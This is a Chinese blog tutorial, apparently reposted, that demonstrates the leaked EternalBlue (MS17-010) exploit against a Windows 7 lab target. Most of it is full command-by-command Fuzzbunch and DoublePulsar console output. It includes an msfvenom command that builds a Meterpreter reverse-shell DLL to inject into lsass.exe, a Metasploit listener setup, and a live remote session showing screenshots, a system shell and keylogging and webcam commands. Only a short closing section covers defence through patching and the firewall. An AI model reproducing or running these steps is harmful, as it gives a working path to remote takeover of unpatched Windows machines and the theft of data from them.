最近那個WannaCry勒索病毒搞的沸沸揚揚，據了解該病毒利用了方程式泄露的0day MS17-010(永恒之藍)進行傳播。

據說這個漏洞是支持winxp-win2012，測試一下這個漏洞到底如何。

一、環境：

靶機：win7 IP:192.168.4.247
攻擊機：win2003 IP:192.168.4.16
反彈shell: kali IP:192.168.4.15

在攻擊機中需要python2.6環境和安裝pywin32

python-2.6.6.msi
https://www.python.org/download/releases/2.6.6/

pywin32-221.win-amd64-py2.6.exe
https://sourceforge.net/projects/pywin32/files/pywin32/Build%20221/

二、配置攻擊機

先可以用nmap掃一下內網里開放445端口和操作系統信息
nmap -p 445 -O 192.168.4.0/24
---------------------------------------------------------------
下載工具之后解壓，然后在工具里面的windows目錄建一個listeningposts
打開cmd工具的windows目錄，運行fb.py

--[ Version 3.5.1[*] Loading Plugins [*] Initializing Fuzzbunch v3.5.1 [*] Adding Global Variables [+] Set ResourcesDir => D:\DSZOPSDISK\Resources [+] Set Color => True [+] Set ShowHiddenParameters => False [+] Set NetworkTimeout => 60 [+] Set LogDir => D:\logs [*] Autorun ONImplantConfig Autorun List ==========================0) prompt confirm1) executeExploit Autorun List ====================0) apply1) touch all2) prompt confirm3) executeSpecial Autorun List ====================0) apply1) touch all2) prompt confirm3) executePayload Autorun List ====================0) apply1) prompt confirm2) execute[+] Set FbStorage => E:\shadowbroker-master\shadowbroker-master\windows\storage[*] Retargetting Session[?] Default Target IP Address [] : 192.168.4.247 [?] Default Callback IP Address [] : 192.168.4.16 [?] Use Redirection [yes] : no[?] Base Log directory [D:\logs] : no [*] Checking E:\shadowbroker-master\shadowbroker-master\windows\no for projects Index Project ----- ------- 0 test 1 test2 2 test3 3 test4 4 test5 5 Create a New Project[?] Project [0] : 5 [?] New Project Name : test6 [?] Set target log directory to 'E:\shadowbroker-master\shadowbroker-master\wind ows\no\test6\z192.168.4.247'? [Yes] :[*] Initializing Global State [+] Set TargetIp => 192.168.4.247 [+] Set CallbackIp => 192.168.4.16[!] Redirection OFF [+] Set LogDir => E:\shadowbroker-master\shadowbroker-master\windows\no\test6\z1 92.168.4.247 [+] Set Project => test6fb >

--------------------------------------------
在這里我們使用Eternalblue（ms17-010 永恒之藍）

fb > use Eternalblue[!] Entering Plugin Context :: Eternalblue [*] Applying Global Variables [+] Set NetworkTimeout => 60 [+] Set TargetIp => 192.168.4.247[*] Applying Session Parameters [*] Running Exploit Touches[!] Enter Prompt Mode :: EternalblueModule: Eternalblue ===================Name Value ---- ----- NetworkTimeout 60 TargetIp 192.168.4.247 TargetPort 445 VerifyTarget True VerifyBackdoor True MaxExploitAttempts 3 GroomAllocations 12 Target WIN72K8R2[!] plugin variables are valid [?] Prompt For Variable Settings? [Yes] :[*] NetworkTimeout :: Timeout for blocking network calls (in seconds). Use -1 f or no timeout.[?] NetworkTimeout [60] :[*] TargetIp :: Target IP Address[?] TargetIp [192.168.4.247] :[*] TargetPort :: Port used by the SMB service for exploit connection[?] TargetPort [445] :[*] VerifyTarget :: Validate the SMB string from target against the target sele cted before exploitation.[?] VerifyTarget [True] :[*] VerifyBackdoor :: Validate the presence of the DOUBLE PULSAR backdoor befor e throwing. This option must be enabled for multiple exploit attempts.[?] VerifyBackdoor [True] :[*] MaxExploitAttempts :: Number of times to attempt the exploit and groom. Dis abled for XP/2K3.[?] MaxExploitAttempts [3] :[*] GroomAllocations :: Number of large SMBv2 buffers (Vista+) or SessionSetup allocations (XK/2K3) to do.[?] GroomAllocations [12] :[*] Target :: Operating System, Service Pack, and Architecture of target OS0) XP Windows XP 32-Bit All Service Packs*1) WIN72K8R2 Windows 7 and 2008 R2 32-Bit and 64-Bit All Service Packs[?] Target [1] : 1[!] Preparing to Execute Eternalblue[*] Mode :: Delivery mechanism*0) DANE Forward deployment via DARINGNEOPHYTE1) FB Traditional deployment from within FUZZBUNCH[?] Mode [0] : 1 [+] Run Mode: FB[?] This will execute locally like traditional Fuzzbunch plugins. Are you sure? (y/n) [Yes] : [*] Redirection OFF[+] Configure Plugin Local Tunnels [+] Local Tunnel - local-tunnel-1 [?] Destination IP [192.168.4.247] : [?] Destination Port [445] : [+] (TCP) Local 192.168.4.247:445[+] Configure Plugin Remote TunnelsModule: Eternalblue ===================Name Value ---- ----- DaveProxyPort 0 NetworkTimeout 60 TargetIp 192.168.4.247 TargetPort 445 VerifyTarget True VerifyBackdoor True MaxExploitAttempts 3 GroomAllocations 12 ShellcodeBuffer Target WIN72K8R2[?] Execute Plugin? [Yes] :

----------------------------------
回車就開始攻擊

[*] Executing Plugin [*] Connecting to target for exploitation.[+] Connection established for exploitation. [*] Pinging backdoor...[+] Backdoor returned code: 10 - Success![+] Ping returned Target architecture: x64 (64-bit)[+] Backdoor is already installed -- nothing to be done. [*] CORE sent serialized output blob (2 bytes): 0x00000000 08 01 .. [*] Received output parameters from CORE [+] CORE terminated with status code 0x00000000 [+] Eternalblue Succeededfb Special (Eternalblue) >

----------------------------------
漏洞已經觸發成功，接著我們配置讓它加載dll反彈shell回kail

fb Special (Eternalblue) > use doublepulsar[!] Entering Plugin Context :: Doublepulsar [*] Applying Global Variables [+] Set NetworkTimeout => 60 [+] Set TargetIp => 192.168.4.247[*] Applying Session Parameters[!] Enter Prompt Mode :: DoublepulsarModule: Doublepulsar ====================Name Value ---- ----- NetworkTimeout 60 TargetIp 192.168.4.247 TargetPort 445 OutputFile Protocol SMB Architecture x86 Function OutputInstall[!] Plugin Variables are NOT Valid [?] Prompt For Variable Settings? [Yes] :[*] NetworkTimeout :: Timeout for blocking network calls (in seconds). Use -1 for no timeout.[?] NetworkTimeout [60] :[*] TargetIp :: Target IP Address[?] TargetIp [192.168.4.247] :[*] TargetPort :: Port used by the Double Pulsar back door[?] TargetPort [445] :[*] Protocol :: Protocol for the backdoor to speak*0) SMB Ring 0 SMB (TCP 445) backdoor1) RDP Ring 0 RDP (TCP 3389) backdoor[?] Protocol [0] :[*] Architecture :: Architecture of the target OS*0) x86 x86 32-bits1) x64 x64 64-bits[?] Architecture [0] : 1 [+] Set Architecture => x64[*] Function :: Operation for backdoor to perform*0) OutputInstall Only output the install shellcode to a binary file on d isk.1) Ping Test for presence of backdoor2) RunDLL Use an APC to inject a DLL into a user mode process.3) RunShellcode Run raw shellcode4) Uninstall Remove's backdoor from system[?] Function [0] : 2 [+] Set Function => RunDLL[*] DllPayload :: DLL to inject into user mode[?] DllPayload [] :

-------------------------------------
到這里需要配置一個反彈shell的dll, 去kali上生成dll放到C:\backdoor.dll, 配置監聽端。

三、配置反彈shell

在kali上生成dll, 放到攻擊機win2003的C:\backdoor.dll上。

msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=10.20.89.101 LPORT=5555 -f dll > backdoor.dll

打開msf控制臺，配置監聽端

?

msf > use exploit/multi/handler msf exploit(handler) > set payload windows/x64/meterpreter/reverse_tcp payload => windows/x64/meterpreter/reverse_tcp msf exploit(handler) > set lhost 192.168.4.15 lhost => 192.168.4.15 msf exploit(handler) > set lport 5555 lport => 5555 msf exploit(handler) > exploit

---------------------------------

四、大功告成

到回到攻擊機win2003上接著配置

?

[?] DllPayload [] : C:\\backdoor.dll [-] Error: Invalid value for 'DllPayload' (C:\\backdoor.dll)[*] DllPayload :: DLL to inject into user mode[?] DllPayload [] :[*] DllOrdinal :: The exported ordinal number of the DLL being injected to call[?] DllOrdinal [1] :[*] ProcessName :: Name of process to inject into[?] ProcessName [lsass.exe] :[*] ProcessCommandLine :: Command line of process to inject into[?] ProcessCommandLine [] :[!] Preparing to Execute Doublepulsar [*] Redirection OFF[+] Configure Plugin Local Tunnels [+] Local Tunnel - local-tunnel-1 [?] Destination IP [192.168.4.247] : [?] Destination Port [445] : [+] (TCP) Local 192.168.4.247:445[+] Configure Plugin Remote TunnelsModule: Doublepulsar ====================Name Value ---- ----- NetworkTimeout 60 TargetIp 192.168.4.247 TargetPort 445 DllPayload . DllOrdinal 1 ProcessName lsass.exe ProcessCommandLine Protocol SMB Architecture x64 Function RunDLL[?] Execute Plugin? [Yes] : [*] Executing Plugin [+] Selected Protocol SMB [.] Connecting to target... [+] Connected to target, pinging backdoor...[+] Backdoor returned code: 10 - Success![+] Ping returned Target architecture: x64 (64-bit) - XOR Key: 0x3B05856 0SMB Connection string is: Windows 7 Ultimate 7601 Service Pack 1Target OS is: 7 x64Target SP is: 1[+] Backdoor installed[+] DLL built[.] Sending shellcode to inject DLL[+] Backdoor returned code: 10 - Success![+] Backdoor returned code: 10 - Success![+] Backdoor returned code: 10 - Success![+] Command completed successfully [+] Doublepulsar Succeeded

到此大功告成，到Kali上看看，shell是不是返回了。

---------------------------------------------------

[*] Started reverse handler on 192.168.4.15:5555 [*] Starting the payload handler... [*] Sending stage (1105970 bytes) to 192.168.4.247 [*] Meterpreter session 1 opened (192.168.4.15:5555 -> 192.168.4.247:49289) at 2017-06-03 01:36:08 +0800meterpreter > sysinfo Computer : HE-PC OS : Windows 7 (Build 7601, Service Pack 1). Architecture : x64 System Language : zh_CN Domain : WORKGROUP Logged On Users : 0 Meterpreter : x64/win64

-------------------------------------------------

meterpreter的功能很強大，可以help看一下

?

?

meterpreter > helpCore Commands =============Command Description------- -----------? Help menubackground Backgrounds the current sessionbgkill Kills a background meterpreter scriptbglist Lists running background scriptsbgrun Executes a meterpreter script as a background threadchannel Displays information about active channelsclose Closes a channeldisable_unicode_encoding Disables encoding of unicode stringsenable_unicode_encoding Enables encoding of unicode stringsexit Terminate the meterpreter sessionget_timeouts Get the current session timeout valueshelp Help menuinfo Displays information about a Post moduleinteract Interacts with a channelirb Drop into irb scripting modeload Load one or more meterpreter extensionsmachine_id Get the MSF ID of the machine attached to the sessionmigrate Migrate the server to another processquit Terminate the meterpreter sessionread Reads data from a channelresource Run the commands stored in a filerun Executes a meterpreter script or Post moduleset_timeouts Set the current session timeout valuessleep Force Meterpreter to go quiet, then re-establish session.transport Change the current transport mechanismuse Deprecated alias for 'load'uuid Get the UUID for the current sessionwrite Writes data to a channelStdapi: File system Commands ============================Command Description------- -----------cat Read the contents of a file to the screencd Change directorydownload Download a file or directoryedit Edit a filegetlwd Print local working directorygetwd Print working directorylcd Change local working directorylpwd Print local working directoryls List filesmkdir Make directorymv Move source to destinationpwd Print working directoryrm Delete the specified filermdir Remove directorysearch Search for filesupload Upload a file or directoryStdapi: Networking Commands ===========================Command Description------- -----------arp Display the host ARP cachegetproxy Display the current proxy configurationifconfig Display interfacesipconfig Display interfacesnetstat Display the network connectionsportfwd Forward a local port to a remote serviceroute View and modify the routing tableStdapi: System Commands =======================Command Description------- -----------clearev Clear the event logdrop_token Relinquishes any active impersonation token.execute Execute a commandgetenv Get one or more environment variable valuesgetpid Get the current process identifiergetprivs Attempt to enable all privileges available to the current processgetsid Get the SID of the user that the server is running asgetuid Get the user that the server is running askill Terminate a processps List running processesreboot Reboots the remote computerreg Modify and interact with the remote registryrev2self Calls RevertToSelf() on the remote machineshell Drop into a system command shellshutdown Shuts down the remote computersteal_token Attempts to steal an impersonation token from the target processsuspend Suspends or resumes a list of processessysinfo Gets information about the remote system, such as OSStdapi: User interface Commands ===============================Command Description------- -----------enumdesktops List all accessible desktops and window stationsgetdesktop Get the current meterpreter desktopidletime Returns the number of seconds the remote user has been idlekeyscan_dump Dump the keystroke bufferkeyscan_start Start capturing keystrokeskeyscan_stop Stop capturing keystrokesscreenshot Grab a screenshot of the interactive desktopsetdesktop Change the meterpreters current desktopuictl Control some of the user interface componentsStdapi: Webcam Commands =======================Command Description------- -----------record_mic Record audio from the default microphone for X secondswebcam_chat Start a video chatwebcam_list List webcamswebcam_snap Take a snapshot from the specified webcamwebcam_stream Play a video stream from the specified webcam

--------------------------------------------------
執行screenshot截屏
meterpreter > screenshot?
Screenshot saved to: /root/eeEcyUfp.jpeg

執行shell就會得到cmd命令行
meterpreter > shell
Process 2880 created.
Channel 1 created.
Microsoft Windows [版本 6.1.7601]
版權所有 (c) 2009 Microsoft Corporation。保留所有權利。

C:\Windows\system32>net user
-------------------------------------------------------------------------------
Administrator ? ? ? ? ? ?Guest ? ? ? ? ? ? ? ? ? ?testuser
命令成功完成。
--------------
輸入exit退出windows的命令行，回到meterpreter

C:\Windows\system32>exit?
exit
meterpreter >?
-------------------------------------------------

?

五、防范ms17-010
最好的方法就是把補丁給打上，就搞不了。以下是在有補丁的機器上測試的效果：

[?] Execute Plugin? [Yes] : [*] Executing Plugin [*] Connecting to target for exploitation.[+] Connection established for exploitation. [*] Pinging backdoor...[+] Backdoor not installed, game on. [*] Target OS selected valid for OS indicated by SMB reply [*] CORE raw buffer dump (39 bytes): 0x00000000 57 69 6e 64 6f 77 73 20 37 20 55 6c 74 69 6d 61 Windows 7 Ultima 0x00000010 74 65 20 37 36 30 31 20 53 65 72 76 69 63 65 20 te 7601 Service 0x00000020 50 61 63 6b 20 31 00 Pack 1. [*] Building exploit buffer [*] Sending all but last fragment of exploit packet................DONE. [*] Sending SMB Echo request [*] Good reply from SMB Echo request [*] Starting non-paged pool grooming[+] Sending SMBv2 buffers.............DONE.[+] Sending large SMBv1 buffer..DONE.[+] Sending final SMBv2 buffers......DONE.[+] Closing SMBv1 connection creating free hole adjacent to SMBv2 buffer. [*] Sending SMB Echo request [*] Good reply from SMB Echo request [*] Sending last fragment of exploit packet!DONE. [*] Receiving response from exploit packet [-] No response received from exploit packet. Not good. [+] CORE terminated with status code 0xdf5d0013 [-] Error getting output back from Core; aborting... [!] Plugin failed [-] Error: Eternalblue Failed

還有一個簡單的方法就是把Windows自帶的防火墻打開，這樣445端口就不通了，漏洞也就沒法搞了，以下是測試的效果：

[?] Execute Plugin? [Yes] : [*] Executing Plugin [*] Connecting to target for exploitation. [-] Error connecting to target [+] CORE terminated with status code 0xdf5d000b [-] Error getting output back from Core; aborting... [!] Plugin failed [-] Error: Eternalblue Failed

原文地址：https://www.exchen.net/%E6%96%B9%E5%BC%8F%E7%A8%8B-0day-ms17-010-%E8%BF%9C%E7%A8%8B%E6%BA%A2%E5%87%BA%E6%BC%8F%E6%B4%9E%E6%B5%8B%E8%AF%95.html

?

總結

以上是生活随笔為你收集整理的方式程0day MS17-010远程溢出漏洞测试的全部內容，希望文章能夠幫你解決所遇到的問題。

如果覺得生活随笔網站內容還不錯，歡迎將生活随笔推薦給好友。